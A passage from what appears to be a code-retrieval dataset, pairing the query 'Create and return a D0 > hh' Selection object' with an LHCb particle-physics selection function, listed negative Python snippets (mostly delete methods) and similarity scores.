# type: () -> BoundAction\n return self._client.delete(self)", "def drop_trigger(self, trig):\n self.vr_trig_queue.put((trig,'done'))", "def delete(self):\n ...", "def delete(self):\n self._client.delete(self)", "def delete(self):\n with self.locked():\n self.path.delete()", "def delete(self):\n with self.locked():\n self.path.delete()", "def delete(self) -> None:\n self.pop()", "def delete():", "def delete(self):\n\n raise NotImplementedError('Must be implemented by subclasses')", "def delete(self):\n os.system(\"rm \"+self._name)", "def delete(self):\n\t\t#self.log.info(\"Deleting file {}\".format(self._filepath))\n\t\tos.remove(self._filepath)", "def delete(self):\r\n delete_tracks(self.project, [self])", "def delete_at_index(self, idx):\n del self.timeseries[idx]\n del self.freq[idx]\n del self.ch_name[idx]\n del self.units[idx]\n\n if self.trigger_idx == idx:\n LGR.warning(\"Removing trigger channel - are you sure you are doing\" \"the right thing?\")\n self.trigger_idx = 0", "def delete(self):\n # exit contains our clean up code\n self.exit()\n GenericAnimatedProp.GenericAnimatedProp.delete(self)", "def delete_template(self):\n try:\n os.remove(self.path)\n except Exception:\n pass", "def delete(self):\n return self.parent.delete_instance(self.name)", "def trigger_delete(cls, instance):\n es_client.delete(instance.blog.index_name(), 'blog_post_index', instance.id)", "def delete(self):\n if not self.is_deleted:\n self.is_deleted = True\n self.save()", "def delete(self):\n self.oxdb.execute(DELETE, self.variable_name, commit=True)\n self._exists = None", "def delete(self):\n\n raise NotImplementedError()", "def delete(self):\n pdbox._args.get(\"dryrun\") or shutil.rmtree(self.path)\n pdbox.info(\"Deleted %s/\" % self.path)", "def __del__(self):\n print(f\"{self.fullname()} deleted from database.\")", "def delete(self):\n del self.shx.atoms[self.index]", "def delete(self):\n self.manager.delete(self.name)", "def delete(self):\n self.manager.delete(self.name)", "def delete(self):\n self.request().delete()", "def delete(self):\n return self._delete", "def delete(self):\r\n self.domain.delete_item(self)", "def delete(self):\n pdbox._args.get(\"dryrun\") or os.remove(self.path)\n pdbox.info(\"Deleted %s\" % self.path)", "def delete_trigger(name: str, engine: Engine, table: str, schema: str = None):\n schema = schema or 'public'\n\n engine.execute(f'DROP TRIGGER IF EXISTS {name} ON {schema}.{table}')", "def delete(self) -> None:\n shutil.rmtree(self.path)", "def delete(self):\n\t\tself.eventStatus = 0\n\t\tself.save()\n\n\t\t# DEBUG\n\t\tcontext = {\n\t\t\t'call_stack': ''.join(traceback.format_stack()),\n\t\t\t'event': self,\n\t\t\t'server_addr': settings.SERVER_ADDRESS,\n\t\t}\n\t\tbody = render_to_string('MHLCallGroups/Scheduler/email_delete_event.txt', context)\n\t\tmail_admins(_('Event Deletion Attempt!'), body)", "def hdel(self):\n return self.delete()", "def removeTrigger(self, trigger):\r\n for k, t in self.literalTriggers.iteritems():\r\n if t.title == trigger:\r\n del self.literalTriggers[k]\r\n return False\r\n else:\r\n for k, t in self.triggers.iteritems():\r\n if t.title == trigger:\r\n del self.triggers[k]\r\n return True\r\n return False", "def delete(self):\n self.model.remove_agents(self)", "def delete(self, *args, **kwargs):\n pass", "def delete(self, *args, **kwargs):\n pass", "def delete():\n click.echo('delete was called.')", "def delete(self):\n self.manager.delete(self)", "def delete_document(self):\n pass", "def ClearRecordsForTrigger(self):\n\t\tpayload = { \"Arg1\": self.href }\n\t\treturn self._execute('clearRecordsForTrigger', payload=payload, response_object=None)", "def delete(self):\n self.vera.delete_scene(self)", "def delete(self):\n DATABASE_CONNECTION.delete(self.__class__.__name__, self.id)", "def delete_command():\n global selected_tuple\n backend.delete(selected_tuple[0])", "def force_delete(self):\n self.manager.force_delete(self)", "def force_delete(self):\n self.manager.force_delete(self)", "def __delete__(self):\n pass", "async def delete(self):\n return await self.set_message(text='')", "def delete(self, downstream = None):\n # emit delete message\n self.deleteSignal.emit(self)", "def delete( self ):\n if os.path.exists(self.filename):\n os.remove(self.filename)", "def delete(self):\n self.graph._del(handle=self.handle)", "def delete(self, filename):\n pass", "def delete(self):\n\n try:\n remove(self.file)\n except OSError:\n pass", "def unsetTrigger(self):\n return _libsbml.Event_unsetTrigger(self)", "def delete(self):\n raise NotImplementedError", "def delete(self):\n if self.is_running:\n raise errors.ChalmersError(\"Can not remove running program (must be stopped)\")\n\n if path.isfile(self.definition_filename):\n os.unlink(self.definition_filename)\n\n if path.isfile(self.state_filename):\n os.unlink(self.state_filename)", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete_word(event):\n get_by_name(\"backward-kill-word\").call(event)", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def delete(self):\n self.data = None", "def remove(self):\r\n\t\tself._delete()", "def delete(self):\n self.method = \"DELETE\"\n self.send()", "def __del__(self) -> None:\n self.delete()", "def delete(self):\n self.package = None" ]
[ "0.7167729", "0.70552254", "0.6779274", "0.6583904", "0.655758", "0.64790803", "0.6461914", "0.6461914", "0.6461914", "0.6461914", "0.645271", "0.64262265", "0.62824124", "0.6266517", "0.62515134", "0.62503153", "0.62478745", "0.62462974", "0.6191452", "0.61563873", "0.61563873", "0.61363184", "0.6109357", "0.6104194", "0.6091601", "0.60879666", "0.60828376", "0.60796404", "0.6074667", "0.60692894", "0.60397273", "0.60386515", "0.60212356", "0.6013759", "0.60083455", "0.6007559", "0.5990807", "0.597058", "0.59644616", "0.59644616", "0.59618175", "0.5959596", "0.5958881", "0.5958856", "0.5954542", "0.59512925", "0.59508365", "0.59355956", "0.59319544", "0.5926145", "0.5915153", "0.5915153", "0.59148014", "0.59021616", "0.58863074", "0.5885904", "0.5882063", "0.58790785", "0.58767354", "0.58728176", "0.58728176", "0.58724385", "0.5866614", "0.5865847", "0.5863907", "0.5863506", "0.5861332", "0.58588994", "0.58587253", "0.5855503", "0.58466923", "0.583655", "0.583655", "0.583655", "0.583655", "0.583655", "0.583655", "0.583655", "0.583655", "0.583655", "0.582966", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.5818831", "0.5817396", "0.5812874", "0.5807403", "0.5800533" ]
0.8082834
0
Create and return a D0 > hh' Selection object.
def makeD2hhAsymm(name, config, KPIDK_string, PiPIDK_string, Mass_low_string, Mass_high_string, CombPIDK_string, DecayDescriptor, inputSel, useTOS, Hlt1TOS, Hlt2TOS ) : def makeTISTOS( name, _input, _hlttos ) : from Configurables import TisTosParticleTagger _tisTosFilter = TisTosParticleTagger( name + "Tagger" ) _tisTosFilter.TisTosSpecs = _hlttos return Selection( name , Algorithm = _tisTosFilter , RequiredSelections = [ _input ] ) _Kcuts1 = "~ISMUON & (PT > %(DaugPtMin)s* MeV) & (MIPCHI2DV(PRIMARY) > %(DaugIPChi2)s)" % locals()['config'] _KcutsPIDK = KPIDK_string % locals()['config'] _Kcuts2 = " & (ISLONG) & (P > %(DaugP)s* MeV) & (TRCHI2DOF < %(DaugTrkChi2)s)" % locals()['config'] _Kcuts = _Kcuts1 + _KcutsPIDK + _Kcuts2 _Picuts1 = "~ISMUON & (PT > %(DaugPtMin)s* MeV) & (MIPCHI2DV(PRIMARY) > %(DaugIPChi2)s)" % locals()['config'] _PicutsPIDK = PiPIDK_string % locals()['config'] _Picuts2 = " & (ISLONG) & (P > %(DaugP)s* MeV) & (TRCHI2DOF < %(DaugTrkChi2)s)" % locals()['config'] _Picuts = _Picuts1 + _PicutsPIDK + _Picuts2 _dauCuts = { 'K+': _Kcuts, 'pi+': _Picuts } _massLow = Mass_low_string % locals()['config'] _massHigh = Mass_high_string % locals()['config'] _combCuts1 = "(APT > %(D0Pt)s* MeV)" \ "& (AHASCHILD( PT > %(DaugPtMax)s* MeV ) )" \ "& (ADOCA(1,2)< %(D0DOCA)s* mm)" \ "& (AP > %(D0P)s* MeV)" % locals()['config'] _combCutsPIDK = CombPIDK_string % locals()['config'] _combCuts = _combCuts1 + _combCutsPIDK + _massLow + _massHigh _motherCuts = "(VFASPF(VCHI2PDOF) < %(D0VtxChi2Ndof)s)" \ "& (BPVVDCHI2 > %(D0FDChi2)s)" \ "& (BPVLTIME() > %(D0Tau)s)" \ "& (BPVDIRA > %(D0BPVDira)s)" % locals()['config'] _D0 = CombineParticles( DecayDescriptor = DecayDescriptor, MotherCut = _motherCuts, CombinationCut = _combCuts, DaughtersCuts = _dauCuts) _sel = Selection ( name+'Sel', Algorithm = _D0, RequiredSelections = inputSel ) if not useTOS: return _sel _selD2hhHlt1TOS = makeTISTOS( name + "D2hhHlt1TOS" , _sel , Hlt1TOS ) _selD2hhHlt2TOS = makeTISTOS( name + "D2hhHlt2TOS" , _selD2hhHlt1TOS , Hlt2TOS ) return _selD2hhHlt2TOS
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def from_selection(cls):\n guid = compas_rhino.select_point()\n return cls.from_guid(guid)", "def get_slider():\n return dcc.RangeSlider(\n id='hours',\n value=[0, 23],\n min=0,\n max=23,\n marks={i: str(i) for i in range(0, 24, 3)}\n )", "def from_selection(cls):\n guid = compas_rhino.select_mesh()\n return cls.from_guid(guid)", "def rangeselector_time():\n return {\n \"bgcolor\": \"rgb(35, 149, 86)\",\n \"activecolor\": \"rgb(25, 108, 62)\",\n \"buttons\": [\n {\"count\": 12, \"label\": \"12h\", \"step\": \"hour\", \"stepmode\": \"backward\"},\n {\"count\": 24, \"label\": \"24h\", \"step\": \"hour\", \"stepmode\": \"backward\"},\n {\"count\": 48, \"label\": \"48h\", \"step\": \"hour\", \"stepmode\": \"backward\"},\n {\"count\": 3, \"label\": \"3d\", \"step\": \"day\", \"stepmode\": \"backward\"},\n {\"count\": 7, \"label\": \"7d\", \"step\": \"day\", \"stepmode\": \"backward\"},\n {\"step\": \"all\"},\n ],\n }", "def selection(self):\n if not self._selection:\n return None\n \n year, month = self._date.year, self._date.month\n return self.datetime(year, month, int(self._selection[0]))", "def create(cls, selection):\n\t\t\n\t\treturn cls({ true_selector: selection, false_selector: Selection.invert(selection) })", "def from_selection(\n class_,\n selection,\n item_class=None,\n ):\n import abjad\n pitch_segment = abjad.PitchSegment.from_selection(selection)\n return class_(\n pitch_segment,\n item_class=item_class,\n )", "def select_hours(self, lhours):\n sel = []\n for i in range(self.dataset.shape[0]):\n stime = time.localtime(np.int32(self.dataset[i][2]))\n hour = stime[3]\n for ih in lhours:\n ihour, fhour = ih\n if ihour <= hour < fhour:\n sel.append(i)\n data = STData(self.wpath, self.city, self.application)\n data.dataset = self.dataset[sel]\n return data", "def _select_by_range(self, disc_low, disc_high):\n sqlstmt = \"SELECT h FROM %s WHERE d>=? and d<=?\" % self.VIEW\n pickup = self.cursor.execute(sqlstmt, (disc_low, disc_high,))\n return [h[0] for h in pickup]", "def _select_by_range(self, disc_low, disc_high):\n sqlstmt = \"SELECT h FROM %s WHERE d>=? and d<=?\" % self.VIEW\n pickup = self.cursor.execute(sqlstmt, (-disc_high, -disc_low))\n return [h[0] for h in pickup]", "def selection(self):\r\n if not self._selection:\r\n print(\"not working\")\r\n return None\r\n\r\n year, month = self._date.year, self._date.month\r\n if len(str(month))==1:\r\n month = \"0{}\".format(month)\r\n return (\"{}{}{}\".format(year, month, self._selection[0]), \r\n \"{} / {} / {}\".format(year, month, self._selection[0]))", "def get_selection(self, selection_name, format=None):", "def makeSelection(self, selection=\"\"):\n\n\t\tif selection == \"\":\n\t\t\tprint \"usage: makeSelection(selection)\"\n\n\t\tsel_string = self.parseMacros(selection)\n\n\t\t# --- split by \";\" --- #\n\t\ttmp = []\n\t\tcols = []\n\t\tcols = sel_string.split(\";\")\n\t\tfor col in cols:\n\t\t\tinverse = False\n\t\t\tif col == \"\":\n\t\t\t\tcontinue\n\n\t\t\ttmp = string.split(col, \"=\")\n\t\t\tif \"!\" in tmp[0]:\n\t\t\t\tinverse = True\n\n\t\t\tif \"resi\" in tmp[0]:\n\t\t\t\tself.parseResI(tmp[1])\n\t\t\t\tself.invresi = inverse\n\t\t\telif \"resn\" in tmp[0]:\n\t\t\t\tself.parseResN(tmp[1])\n\t\t\t\tself.invresn = inverse\n\t\t\telif \"name\" in tmp[0]:\n\t\t\t\tself.parseAtom(tmp[1])\n\t\t\t\tself.invatom = inverse\n\t\t\telif \"element\" in tmp[0]:\n\t\t\t\tself.parseElement(tmp[1])\n\t\t\t\tself.invelement = inverse\t\n\t\t\telif \"chain\" in tmp[0]:\n\t\t\t\tself.parseChain(tmp[1])\n\t\t\t\tself.invchain = inverse\n\t\t\telif \"type\" in tmp[0]:\n\t\t\t\tself.parseType(tmp[1])\n\t\t\t\tself.invtype = inverse\n\t\t\telif \"cat\" in tmp[0]:\n\t\t\t\tself.parseCat(tmp[1])\n\t\t\t\tself.invcat = inverse\n\t\t\telif \"atomid\" in tmp[0]:\n\t\t\t\tself.parseAtomid(tmp[1])\n\t\t\t\tself.invatomid = inverse\n\t\t\telif \"BB\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O \")\n\t\t\t\tself.invatom = False\n\t\t\telif \"CEN\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O , CB \")\n\t\t\t\tself.invatom = False\n\t\t\telif \"SC\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O \")\n\t\t\t\tself.invatom = True\n\t\t\telif \"HET\" in tmp[0]:\n\t\t\t\tself.parseType(\"HETATM\")\n\t\t\t\tself.invtype = inverse\n\t\t\telse:\n\t\t\t\tprint \"unrecognized selector: \",tmp[0]\n\t\t\t\tsys.exit()", "def get_h0(self, t):\n return self.h0", "def get_selection():\n\n selected = Gui.Selection.getSelectionEx()[0].SubObjects\n sel_len = len(selected)\n result = SelectionContainer()\n\n for _x in range(0, sel_len):\n\n shape_type = selected[_x].ShapeType\n\n if shape_type == 'Vertex':\n result.vertices.append(selected[_x])\n\n elif shape_type == 'Edge':\n\n if 'Line' in str(selected[_x].Curve):\n result.lines.append(selected[_x])\n else:\n result.curves.append(selected[_x])", "def make_selection ( self ,\n tag , \n algotype ,\n inputs , \n *args ,\n **kwargs ) :\n sel_tag = '%s_Selection' % tag\n sel_name = 'Sel%sFor%s' % ( tag , self.name() )\n #\n ## check existing selection\n #\n sel = self._selection ( sel_tag )\n if sel : return sel \n\n #\n ## adjust a bit the arguments\n if not kwargs.has_key('Preambulo') :\n kwargs ['Preambulo' ] = self['Preambulo']\n\n if not kwargs.has_key( 'ParticleCombiners' ) :\n kwargs ['ParticleCombiners'] = { '' : 'LoKi::VertexFitter:PUBLIC' } \n \n # \n ## use \"simple-selection\"\n #\n from PhysSelPython.Wrappers import SimpleSelection\n sel = SimpleSelection (\n sel_name ,\n algotype ,\n inputs , \n *args ,\n **kwargs )\n # \n return self._add_selection( sel_tag , sel )", "def build_selection_spec(client_factory, name):\r\n sel_spec = client_factory.create('ns0:SelectionSpec')\r\n sel_spec.name = name\r\n return sel_spec", "def getSect(self, h):\n coordtrasp=self.coord.T\n lefttomin=self.coord[1][:self.min+1]\n # left point\n lpnt = self.firstPointAfter_h(lefttomin[::-1], h)\n # find index of left point\n l_pnt = self.min - lpnt\n # find left intersection\n l_intersect = self.intersection(coordtrasp[l_pnt], coordtrasp[l_pnt+1], h)\n # right point\n rpnt = self.firstPointAfter_h(self.coord[1][self.min:], h)\n # find index of right point\n r_pnt = self.min + rpnt\n # find right intersection\n r_intersect = self.intersection(coordtrasp[r_pnt], coordtrasp[r_pnt-1], h)\n # make new section geometries\n sez = coordtrasp[l_pnt+1:r_pnt]\n # Add left intersection on the top\n sez=np.insert(sez, [0,], l_intersect,axis=0)\n # Add rightht intersection on the bottom\n sez=np.append(sez,[r_intersect],axis=0)\n return sez", "def createSelector(self,type='select',speed=2.0):\n self.selector = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector.hide()\n ival = self.selector.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def createSelector2(self,type='select',speed=2.0):\n self.selector2 = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector2.hide()\n ival = self.selector2.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def cdd_Hrepresentation(self):\n return cdd_Hrepresentation(self._cdd_type, \n [i for i in self.inequalities()],\n [e for e in self.equation_generator()] )", "def _add_selection ( self , nick , sel ) :\n if not self.__selections_.has_key ( self.name() ) :\n self.__selections_[ self.name() ] = {} \n \n if self.__selections_[ self.name()].has_key( nick ) :\n raise AttributeError , \"Selection '%s'already exists \" % nick\n \n self.__selections_[ self.name() ][ nick ] = sel\n \n return sel", "def shortened_selective(G, H):\n if G == 0 or H == 0:\n return Game(0)\n else:\n left_1 = {shortened_selective(G_L, H) for G_L in G._left}\n left_2 = {shortened_selective(G, H_L) for H_L in H._left}\n left_3 = {shortened_selective(G_L, H_L) for G_L in G._left for H_L in H._left}\n right_1 = {shortened_selective(G_R, H) for G_R in G._right}\n right_2 = {shortened_selective(G, H_R) for H_R in H._right}\n right_3 = {shortened_selective(G_R, H_R) for G_R in G._right for H_R in H._right}\n return Game(left_1 | left_2 | left_3, right_1 | right_2 | right_3)", "def __hour(self):\n return _VirtualColumn(\n df_name=self.thisptr[\"df_name_\"],\n operator=\"hour\",\n operand1=self,\n operand2=None\n )", "def add_selector(self, listing):\n # We will be able to select X-frames and its boundaries\n # will be stored in the given list\n\n def onselect(xmin, xmax):\n# indmin, indmax = np.searchsorted(x, (xmin, xmax))\n# indmax = min(len(x)-1, indmax)\n indmin = xmin\n indmax = xmax\n onselect.listing.append([indmin, indmax])\n print (onselect.listing)\n \n onselect.listing = listing\n \n # set useblit True on gtkagg for enhanced performance\n ax = self.axes\n span = SpanSelector(ax, onselect, 'horizontal', useblit=True,\n rectprops=dict(alpha=0.5, facecolor='red') )\n \n self.widget_list.append(span)", "def data_selection(data, columnX=\"time\", columnY=\"forceX\", ylim=None):\n\n fig = plt.figure(figsize=(8, 6))\n ax = fig.add_subplot(111)\n if ylim is not None:\n ax.set_ylim(ylim[0], ylim[1])\n x = data[columnX]\n y = data[columnY]\n ax.plot(x, y, '-')\n\n fig.suptitle(\"Press any key to confirm selection and close this window\", fontsize=14, fontweight='bold')\n ax.set_title(\"Select data by dragging the mouse\")\n\n def onselect(xmin, xmax):\n \"\"\"\n Sub-function to assign the minimum and maximum of the range and plot the selection\"\n\n Args:\n xmin (int): minimum index of selection\n xmax (int): maximum index of selection\n \"\"\"\n global indmin\n global indmax\n global span\n\n try:\n span.remove()\n fig.canvas.draw()\n except:\n pass\n\n indmin, indmax = np.searchsorted(x, (xmin, xmax))\n indmax = min(len(x) - 1, indmax)\n ax.axvspan(x.values[int(indmin)], x.values[int(indmax)], facecolor=\"red\", alpha=0.5)\n fig.canvas.draw()\n\n # set useblit True on gtkagg for enhanced performance\n span = SpanSelector(ax, onselect, 'horizontal', useblit=True, rectprops=dict(alpha=0.5, facecolor='red'))\n mng = plt.get_current_fig_manager()\n mng.window.showMaximized()\n plt.show()\n\n while True:\n wait = plt.waitforbuttonpress(timeout=60)\n if wait:\n plt.close('all')\n break\n else:\n pass\n\n idCol = column_indexer(data)\n mask = (data[columnX] >= data.iloc[indmin, idCol[columnX]]) & \\\n (data[columnX] <= data.iloc[indmax, idCol[columnX]])\n subData = data.loc[mask, :]\n\n return subData", "def hour(self) -> Index:\n warnings.warn(\n \"`hour` will return int32 index instead of int 64 index in 4.0.0.\",\n FutureWarning,\n )\n return Index(self.to_series().dt.hour)", "def care_color_HH(selection):\n acids = \"{} and (resn ASP or resn ASH or resn GLU or resn GLH)\".format(selection)\n bases = \"{} and (resn HIS or resn HIE or resn HID or resn HIP or resn ARG \\\n or resn LYS or resn LYN)\".format(selection)\n polars = \"{} and (resn CYS or resn CYX or resn GLN or resn ASN or resn SER \\\n or resn TYR or resn THR)\".format(selection)\n nonpolars = \"{} and (resn GLY or resn ALA or resn LEU or resn ILE or resn PHE \\\n or resn TRP or resn MET or resn PRO or resn VAL)\".format(selection)\n cmd.color(\"firebrick\", acids)\n cmd.color(\"deepteal\", bases)\n cmd.color(\"tv_orange\", polars)\n cmd.color(\"smudge\", nonpolars)\n util.cnc(selection)", "def _get_range(self):\n return tuple((0, m, 1) for m in self.level_shapes[0])", "def _getAsSelection(self):\n return self._asSelection", "def get_gold_selection(self, pointer):\n raise NotImplementedError", "def get_gti_from_hdu(gtihdu):\n gtitable = gtihdu.data\n\n colnames = [col.name for col in gtitable.columns]\n # Default: NuSTAR: START, STOP. Otherwise, try RXTE: Start, Stop\n if \"START\" in colnames:\n startstr, stopstr = \"START\", \"STOP\"\n else:\n startstr, stopstr = \"Start\", \"Stop\"\n\n gtistart = np.array(gtitable.field(startstr), dtype=np.longdouble)\n gtistop = np.array(gtitable.field(stopstr), dtype=np.longdouble)\n gti_list = np.vstack((gtistart, gtistop)).T\n\n return gti_list", "def rangeselector_date():\n return {\n \"bgcolor\": \"rgb(35, 149, 86)\",\n \"activecolor\": \"rgb(25, 108, 62)\",\n \"buttons\": [\n {\"count\": 7, \"label\": \"1w\", \"step\": \"day\", \"stepmode\": \"backward\"},\n {\"count\": 14, \"label\": \"2w\", \"step\": \"day\", \"stepmode\": \"backward\"},\n {\"count\": 1, \"label\": \"1m\", \"step\": \"month\", \"stepmode\": \"backward\"},\n {\"count\": 3, \"label\": \"3m\", \"step\": \"month\", \"stepmode\": \"backward\"},\n {\"step\": \"all\"},\n ],\n }", "def select_time(new_cube, lower, upper):\n\n sliced_cube = new_cube.extract(iris.Constraint(year=lambda y: lower<=y<=upper))\n\n return sliced_cube", "def select(cursor, q, expire_after=None):\n if expire_after:\n query = \"\"\"SELECT h.* FROM hasil h\n JOIN pencarian p ON (p.id=h.query_id)\n WHERE p.query=:query and \n CAST( \n (JULIANDAY('now', 'localtime') - JULIANDAY(p.timestamp)) \n AS INTEGER) <= :expire_after\"\"\"\n \n rows = cursor.execute(query, {'query': q,\n 'expire_after': expire_after})\n return HasilCollections(rows)\n raise NotImplementedError", "def start(self):\n return _uhd_swig.range_t_start(self)", "def __init__(self,\n h=0.01):\n super().__init__(1, 100000000,\n 1, 1,\n 5, 10,\n 0, -1, h)", "def horde_start(self, observation):", "def __call__(self) -> abjad.Selection:\n if (self._repetition_chance == 0.0\n or random.random() > self._repetition_chance):\n if not self._is_first_window or self._process_on_first_call:\n if self._mode == 'out':\n self._remove_element()\n else:\n self._add_element()\n elif not self._include_empty_measures and self._mode == 'in':\n self._add_element()\n self._mask_to_selection()\n return self.current_window", "def get_selection(\n cls,\n selections: list[str],\n title: str = \"\",\n subtitle: str = \"\",\n ) -> int:\n menu = cls.make_selection_menu(\n selections=selections,\n title=title,\n subtitle=subtitle,\n show_exit_item=False,\n )\n return cast(int, menu.show())", "def blankUpdateRange(dayHour):\n return { 'position': dayHour, 'updateHistory': [dayHour], 'width': Predictor.rangeWidth }", "def roi_hdu_from_sel(\n sel_image: np.ndarray,\n color_ix: int,\n eye_name: str,\n instrument: str = \"MCAM\",\n sel_fn: str = None,\n) -> fits.PrimaryHDU:\n roi_array = select_roi_by_ix(sel_image, color_ix)\n color_name = roi_color_ix_to_color_name(color_ix, instrument)\n merspect_metadata = {\"EYE\": eye_name, \"SOURCEFN\": Path(sel_fn).name}\n roi_hdu = make_roi_hdu(roi_array, color_name, merspect_metadata)\n roi_hdu.name = color_name + \" \" + eye_name\n return roi_hdu", "def _select_single(self, disc):\n return QuadraticFieldClassNumbersTable._select_single(self, -disc)", "def make_selection_menu(\n cls,\n selections: list[str],\n title: str = \"\",\n subtitle: str = \"\",\n *,\n show_exit_item: bool = False,\n ) -> CursesMenu:\n menu = cls(title=title, subtitle=subtitle, show_exit_item=show_exit_item)\n from cursesmenu.items.selection_item import SelectionItem\n\n for index, selection in enumerate(selections):\n menu.items.append(\n SelectionItem(text=selection, index=index, should_exit=True),\n )\n return menu", "def extract_H_ranges(Work: dict) -> str:\n work_H_rows = Work[\"libE_info\"][\"H_rows\"]\n if len(work_H_rows) == 1:\n return str(work_H_rows[0])\n else:\n # From https://stackoverflow.com/a/30336492\n ranges = []\n for diff, group in groupby(enumerate(work_H_rows.tolist()), lambda x: x[0] - x[1]):\n group = list(map(itemgetter(1), group))\n if len(group) > 1:\n ranges.append(str(group[0]) + \"-\" + str(group[-1]))\n else:\n ranges.append(str(group[0]))\n return \"_\".join(ranges)", "def select_bounds(ds, bounds):\n \n xs = slice(bounds[0][0], bounds[1][0])\n ys = slice(bounds[1][1], bounds[0][1])\n # select over x and y axis\n return ds.sel(x=xs, y=ys)", "def get_geometry(self, selection_name):", "def generate_24hrs():\n\n hrs = []\n\n for i in xrange(1, 25):\n hrs.append([i, 0])\n\n return hrs", "def _getHyperslabSlices(dsetshape, select):\n\n if select is None:\n # Default: return entire dataset\n return tuple(slice(0, extent) for extent in dsetshape)\n\n if not select.startswith('['):\n msg = \"Bad Request: selection query missing start bracket\"\n raise HTTPError(400, reason=msg)\n if not select.endswith(']'):\n msg = \"Bad Request: selection query missing end bracket\"\n raise HTTPError(400, reason=msg)\n\n # strip brackets\n select = select[1:-1]\n\n select_array = select.split(',')\n if len(select_array) > len(dsetshape):\n msg = \"Bad Request: number of selected dimensions exceeds the rank of the dataset\"\n raise HTTPError(400, reason=msg)\n\n slices = []\n for dim, dim_slice in enumerate(select_array):\n extent = dsetshape[dim]\n\n # default slice values\n start = 0\n stop = extent\n step = 1\n if dim_slice.find(':') < 0:\n # just a number - return slice(start, start + 1, 1) for this dimension\n try:\n start = int(dim_slice)\n except ValueError:\n msg = \"Bad Request: invalid selection parameter (can't convert to int) for dimension: \" + str(dim)\n raise HTTPError(400, reason=msg)\n stop = start + 1\n elif dim_slice == ':':\n # select everything (default)\n pass\n else:\n fields = dim_slice.split(\":\")\n if len(fields) > 3:\n msg = \"Bad Request: Too many ':' seperators for dimension: \" + str(dim)\n raise HTTPError(400, reason=msg)\n try:\n if fields[0]:\n start = int(fields[0])\n if fields[1]:\n stop = int(fields[1])\n if len(fields) > 2 and fields[2]:\n step = int(fields[2])\n except ValueError:\n msg = \"Bad Request: invalid selection parameter (can't convert to int) for dimension: \" + str(dim)\n raise HTTPError(400, reason=msg)\n\n if start < 0 or start > extent:\n msg = \"Bad Request: Invalid selection start parameter for dimension: \" + str(dim)\n raise HTTPError(400, reason=msg)\n if stop > extent:\n msg = \"Bad Request: Invalid selection stop parameter for dimension: \" + str(dim)\n raise HTTPError(400, reason=msg)\n if step <= 0:\n msg = \"Bad Request: invalid selection step parameter for dimension: \" + str(dim)\n raise HTTPError(400, reason=msg)\n slices.append(slice(start, stop, step))\n\n return tuple(slices)", "def __init__(self):\n self.minh = []\n self.maxh = []", "def create_selector_bcg(self, bcg_sd, bcg_time):\n bcg_nr = self.time_to_number(bcg_time)\n bcg = self.filter_line.iloc[0:bcg_nr].mean()\n std = self.filter_line.iloc[0:bcg_nr].std()\n ind = [True if value > bcg+bcg_sd *\n std else False for value in self.filter_line]\n ind2 = ind[1:]\n ind2.append(False)\n index = [i for i in range(0, len(ind)) if ind[i] != ind2[i]]\n\n self.starts = [index[i] for i in range(len(index)) if i % 2 == 0]\n self.ends = [index[i] for i in range(len(index)) if i % 2 != 0]\n\n self.create_on_off()", "def _select_all(self):\n sqlstmt = \"SELECT d, h FROM %s\" % self.VIEW\n return [(-d, h) for (d, h) in self.cursor.execute(sqlstmt)]", "def get_selection_first_coord(sel, name=\"(sel)\"):\n\n #print \"--> selection %(name)s: %(sel)s\" % vars()\n cmd.select(name, sel)\n try:\n return numpy.array(cmd.get_model(name).atom[0].coord)\n except IndexError:\n print \"--> empty selection: %(sel)s\" % vars()\n raise", "def define_range():\n\n def_range = {'lt': [0.0, 24.0],\n 'lon': [0.0, 360.0],\n 'angle': [0.0, 2.0 * np.pi]}\n\n return def_range", "def _generateTimeSelector(self, dParams, sPreamble, sPostamble):\n\n if WuiDispatcherBase.ksParamEffectiveDate in dParams:\n tsEffective = dParams[WuiDispatcherBase.ksParamEffectiveDate]\n del dParams[WuiDispatcherBase.ksParamEffectiveDate]\n else:\n tsEffective = ''\n\n # Forget about page No when changing a period\n if WuiDispatcherBase.ksParamPageNo in dParams:\n del dParams[WuiDispatcherBase.ksParamPageNo]\n\n sHtmlTimeSelector = '<form name=\"TimeForm\" method=\"GET\">\\n'\n sHtmlTimeSelector += sPreamble;\n sHtmlTimeSelector += '\\n <select name=\"%s\" onchange=\"window.location=' % WuiDispatcherBase.ksParamEffectiveDate\n sHtmlTimeSelector += '\\'?%s&%s=\\' + ' % (webutils.encodeUrlParams(dParams), WuiDispatcherBase.ksParamEffectiveDate)\n sHtmlTimeSelector += 'this.options[this.selectedIndex].value;\" title=\"Effective date\">\\n'\n\n aoWayBackPoints = [\n ('+0000-00-00 00:00:00.00', 'Now', ' title=\"Present Day. Present Time.\"'), # lain :)\n\n ('-0000-00-00 01:00:00.00', '1 hour ago', ''),\n ('-0000-00-00 02:00:00.00', '2 hours ago', ''),\n ('-0000-00-00 03:00:00.00', '3 hours ago', ''),\n\n ('-0000-00-01 00:00:00.00', '1 day ago', ''),\n ('-0000-00-02 00:00:00.00', '2 days ago', ''),\n ('-0000-00-03 00:00:00.00', '3 days ago', 